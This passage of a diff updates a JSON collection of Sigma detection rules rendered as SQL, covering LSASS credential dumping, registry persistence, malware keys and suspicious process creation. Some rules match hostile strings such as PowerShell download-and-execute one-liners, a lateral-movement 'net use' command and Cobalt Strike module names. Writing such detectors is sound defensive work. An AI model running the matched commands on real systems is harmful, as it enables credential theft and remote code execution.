SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, 
Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use 
\\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by 
wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE 
'%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND 
CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the 
\"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX 
((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + 
